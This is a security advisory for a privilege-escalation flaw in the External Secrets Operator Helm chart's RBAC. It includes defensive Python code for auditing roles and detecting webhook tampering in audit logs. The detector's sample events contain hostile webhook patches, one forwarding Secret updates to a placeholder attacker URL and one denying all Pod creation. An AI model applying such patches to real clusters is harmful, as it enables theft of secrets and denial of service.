GHSA-qwgc-rr35-h4x9

Source
https://github.com/advisories/GHSA-qwgc-rr35-h4x9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-qwgc-rr35-h4x9/GHSA-qwgc-rr35-h4x9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qwgc-rr35-h4x9
Aliases
Published
2024-09-09T18:16:22Z
Modified
2024-09-18T18:44:47Z
Severity
  • 8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H
  • 8.3 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N
Summary
External Secrets Operator vulnerable to privilege escalation
Details

The external-secrets Helm chart ships a deployment named default-external-secrets-cert-controller, which is bound to a ClusterRole of the same name. That ClusterRole grants the "get" and "list" verbs on the secrets resource (https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49) and the "patch" and "update" verbs on the validatingwebhookconfigurations resource (https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27). Both grants are cluster-wide, so a malicious user who can access the worker node running this deployment, and therefore its service-account token, can:

  1. With "get/list" on secrets, use the deployment's service-account token to read every Secret in the whole cluster, including a cluster-admin token Secret if one has been created. That token then allows arbitrary actions against the cluster, resulting in a cluster-level privilege escalation.

  2. With "patch/update" on validatingwebhookconfigurations, rewrite an admission webhook either to obtain sensitive data or to launch a denial-of-service (DoS) attack:

For the data-theft variant of the privilege escalation, the attacker updates or patches a webhook so that it matches UPDATE operations on Secrets and points it at a logging service the attacker controls. The API server then sends the admission request, including the Secret body, to that service on every Secret update, so the attacker indirectly gains access to the full contents of each updated Secret.

For the DoS attack, the attacker updates or patches a webhook so that it denies all Pod CREATE and UPDATE requests. No new Pods can be created and existing Pods cannot be updated until the webhook configuration is repaired.
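To check a cluster for the two grants described above, the following is an added example and not code from the external-secrets project. It audits a Role or ClusterRole together with its binding and reports every unscoped grant of get/list on secrets or update/patch on validatingwebhookconfigurations, with the scope the binding gives it. The vulnerable objects are constructed to mirror the advisory's description of the chart; the hardened variant, the webhook name external-secrets-webhook and the Secret name external-secrets-webhook-tls are assumptions for illustration, not the fix shipped in 0.10.2.

```python
"""RBAC audit for the grants described in GHSA-qwgc-rr35-h4x9.

Added example, not code from the external-secrets project. The manifests below
are constructed to mirror the advisory; the hardened objects and the names
"external-secrets-webhook" / "external-secrets-webhook-tls" are assumptions.
Real objects can be fed in from: kubectl get clusterrole <name> -o json
"""
import json

# Capabilities the advisory turns into privilege escalation or DoS.
WATCHLIST = {
    ("", "secrets"): {"get", "list", "watch"},
    ("admissionregistration.k8s.io", "validatingwebhookconfigurations"): {"update", "patch"},
}


def _covers(listed, wanted):
    """An RBAC rule field matches a value if it names it or uses the wildcard."""
    return "*" in listed or wanted in listed


def dangerous_rules(role):
    """Return (resource, verbs, scoped_by_name) for each rule granting a watchlisted verb."""
    hits = []
    for rule in role.get("rules", []):
        verbs = set(rule.get("verbs", []))
        names = rule.get("resourceNames", [])
        for (group, resource), risky in WATCHLIST.items():
            if not (_covers(rule.get("apiGroups", []), group)
                    and _covers(rule.get("resources", []), resource)):
                continue
            granted = risky if "*" in verbs else risky & verbs
            if not granted:
                continue
            # resourceNames pins get/update/patch to named objects, but it
            # cannot restrict list/watch, so such a grant stays unscoped.
            scoped = bool(names) and not (granted & {"list", "watch"})
            hits.append((resource, sorted(granted), scoped))
    return hits


def audit(role, binding):
    """Report every unscoped watchlisted grant with the scope its binding gives it."""
    if binding["kind"] == "ClusterRoleBinding":
        scope = "cluster"
    else:
        scope = "namespace/" + binding["metadata"]["namespace"]
    subjects = [f'{s["kind"]}:{s.get("namespace", "")}:{s["name"]}' for s in binding["subjects"]]
    return [
        {"subjects": subjects, "scope": scope, "resource": resource, "verbs": verbs}
        for resource, verbs, scoped in dangerous_rules(role)
        if not scoped
    ]


SA = {"kind": "ServiceAccount", "name": "external-secrets-cert-controller",
      "namespace": "external-secrets"}  # assumed subject name

# Constructed to mirror the advisory: one ClusterRole bound cluster-wide.
VULNERABLE_CLUSTER_ROLE = {
    "kind": "ClusterRole", "metadata": {"name": "default-external-secrets-cert-controller"},
    "rules": [
        {"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]},
        {"apiGroups": ["admissionregistration.k8s.io"],
         "resources": ["validatingwebhookconfigurations"],
         "verbs": ["get", "list", "watch", "update", "patch"]},
    ],
}
CLUSTER_BINDING = {"kind": "ClusterRoleBinding",
                   "metadata": {"name": "default-external-secrets-cert-controller"},
                   "subjects": [SA]}

# Assumed hardening (illustration, not the project's fix): webhook writes pinned
# to one named object, Secret access moved to a namespaced Role pinned to the
# webhook's TLS Secret.
HARDENED_CLUSTER_ROLE = {
    "kind": "ClusterRole", "metadata": {"name": "default-external-secrets-cert-controller"},
    "rules": [{"apiGroups": ["admissionregistration.k8s.io"],
               "resources": ["validatingwebhookconfigurations"],
               "resourceNames": ["external-secrets-webhook"],
               "verbs": ["get", "list", "watch", "update", "patch"]}],
}
HARDENED_ROLE = {
    "kind": "Role", "metadata": {"name": "cert-controller-tls", "namespace": "external-secrets"},
    "rules": [{"apiGroups": [""], "resources": ["secrets"],
               "resourceNames": ["external-secrets-webhook-tls"],
               "verbs": ["get", "update", "patch"]}],
}
NAMESPACE_BINDING = {"kind": "RoleBinding",
                     "metadata": {"name": "cert-controller-tls", "namespace": "external-secrets"},
                     "subjects": [SA]}

if __name__ == "__main__":
    for role, binding in ((VULNERABLE_CLUSTER_ROLE, CLUSTER_BINDING),
                          (HARDENED_CLUSTER_ROLE, CLUSTER_BINDING),
                          (HARDENED_ROLE, NAMESPACE_BINDING)):
        print(role["metadata"]["name"], json.dumps(audit(role, binding), indent=2))
```

The vulnerable pair yields two cluster-scoped findings (get/list on secrets, patch/update on validatingwebhookconfigurations); the hardened pair yields none because each write is pinned by resourceNames. Note that a rule which grants list or watch on secrets is reported even when resourceNames is present, since Kubernetes does not apply resourceNames to those verbs.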

PoC

Please see the "Details" section
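The webhook rewrites described in the Details section leave a trace in the API server audit log. The following is an added detection example, not code from the external-secrets project. It assumes an audit policy that records writes to validatingwebhookconfigurations at level RequestResponse so that requestObject is present; the events, the service-account username and the webhook names in them are constructed placeholders. Because the attacker is using the cert-controller's own token, identity alone cannot separate a legitimate reconcile from abuse, so the check keys on which fields a write touches: a CA-bundle refresh only writes caBundle, while Secret exfiltration or a Pod DoS needs rules, clientConfig or failurePolicy.

```python
"""Flag ValidatingWebhookConfiguration writes that change matching or routing fields.

Added example, not code from the external-secrets project. Assumes audit events
at level RequestResponse (requestObject present); the events below are
constructed and the service-account and webhook names are placeholders.
"""
import json

WEBHOOK_RESOURCE = "validatingwebhookconfigurations"
# Fields a CA-bundle refresh never needs to change.
SENSITIVE_FIELDS = ("rules", "clientConfig", "failurePolicy", "namespaceSelector", "objectSelector")
SA_USER = "system:serviceaccount:external-secrets:external-secrets-cert-controller"  # assumed


def _leaf_paths(obj, prefix=""):
    """Yield JSON-pointer style paths to every scalar in a nested object."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _leaf_paths(value, f"{prefix}/{key}")
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from _leaf_paths(value, f"{prefix}/{index}")
    else:
        yield prefix


def touched_paths(request_object):
    """Paths written by a JSON patch (list of ops) or by a full update / merge patch (dict)."""
    if isinstance(request_object, list):
        paths = []
        for op in request_object:
            base, value = op.get("path", ""), op.get("value")
            paths.extend(_leaf_paths(value, base) if isinstance(value, (dict, list)) else [base])
        return paths
    if isinstance(request_object, dict):
        return list(_leaf_paths(request_object))
    return []


def suspicious_paths(paths):
    """Keep paths that touch matching or routing fields; a caBundle write alone is benign."""
    out = []
    for path in paths:
        parts = path.split("/")
        if parts[-1] != "caBundle" and any(field in parts for field in SENSITIVE_FIELDS):
            out.append(path)
    return out


def detect(audit_lines):
    """One finding per patch/update of a ValidatingWebhookConfiguration that rewrites sensitive fields."""
    findings = []
    for line in audit_lines:
        event = json.loads(line)
        ref = event.get("objectRef", {})
        if event.get("verb") not in ("patch", "update") or ref.get("resource") != WEBHOOK_RESOURCE:
            continue
        bad = suspicious_paths(touched_paths(event.get("requestObject")))
        if bad:
            findings.append({
                "auditID": event["auditID"],
                "user": event["user"]["username"],
                "webhook": ref.get("name"),
                "fields": sorted({f for p in bad for f in SENSITIVE_FIELDS if f in p.split("/")}),
            })
    return findings


REF = {"resource": WEBHOOK_RESOURCE, "name": "external-secrets-webhook"}
AUDIT_EVENTS = [  # constructed sample events, one JSON object per line
    # 1. Legitimate reconcile: the cert-controller refreshes the CA bundle.
    json.dumps({"auditID": "a1", "verb": "patch", "user": {"username": SA_USER}, "objectRef": REF,
                "requestObject": [{"op": "replace", "path": "/webhooks/0/clientConfig/caBundle",
                                   "value": "Q0EgYnVuZGxl"}]}),
    # 2. Same token: adds a webhook that forwards every Secret UPDATE to an attacker URL.
    json.dumps({"auditID": "a2", "verb": "patch", "user": {"username": SA_USER}, "objectRef": REF,
                "requestObject": [{"op": "add", "path": "/webhooks/-", "value": {
                    "name": "exfil.example.invalid",
                    "rules": [{"apiGroups": [""], "apiVersions": ["v1"],
                               "operations": ["UPDATE"], "resources": ["secrets"]}],
                    "clientConfig": {"url": "https://attacker.example.invalid/capture"},
                    "failurePolicy": "Ignore", "sideEffects": "None",
                    "admissionReviewVersions": ["v1"]}}]}),
    # 3. Full update that makes the webhook reject every Pod CREATE/UPDATE.
    json.dumps({"auditID": "a3", "verb": "update", "user": {"username": SA_USER}, "objectRef": REF,
                "requestObject": {"kind": "ValidatingWebhookConfiguration",
                                  "metadata": {"name": "external-secrets-webhook"},
                                  "webhooks": [{"name": "deny.example.invalid",
                                                "rules": [{"apiGroups": [""], "apiVersions": ["v1"],
                                                           "operations": ["CREATE", "UPDATE"],
                                                           "resources": ["pods"]}],
                                                "clientConfig": {"url": "https://127.0.0.1:1/unreachable"},
                                                "failurePolicy": "Fail", "sideEffects": "None",
                                                "admissionReviewVersions": ["v1"]}]}}),
    # 4. Unrelated read, ignored by the detector.
    json.dumps({"auditID": "a4", "verb": "get", "user": {"username": SA_USER},
                "objectRef": {"resource": "secrets", "namespace": "kube-system", "name": "s"}}),
]

if __name__ == "__main__":
    print(json.dumps(detect(AUDIT_EVENTS), indent=2))
```

Events a2 and a3 are reported; a1 is not, because the only path written ends in caBundle. A full update (a3) always carries the whole object, so in production this check should diff requestObject against the previous state rather than treat every full PUT as a rewrite.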

Impact

Privilege escalation

Database specific
{
    "nvd_published_at": "2024-09-09T15:15:11Z",
    "cwe_ids": [
        "CWE-269",
        "CWE-732"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-09T18:16:22Z"
}
References

Affected packages

Go / github.com/external-secrets/external-secrets

Package

Name
github.com/external-secrets/external-secrets
Purl
pkg:golang/github.com/external-secrets/external-secrets

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
0.10.2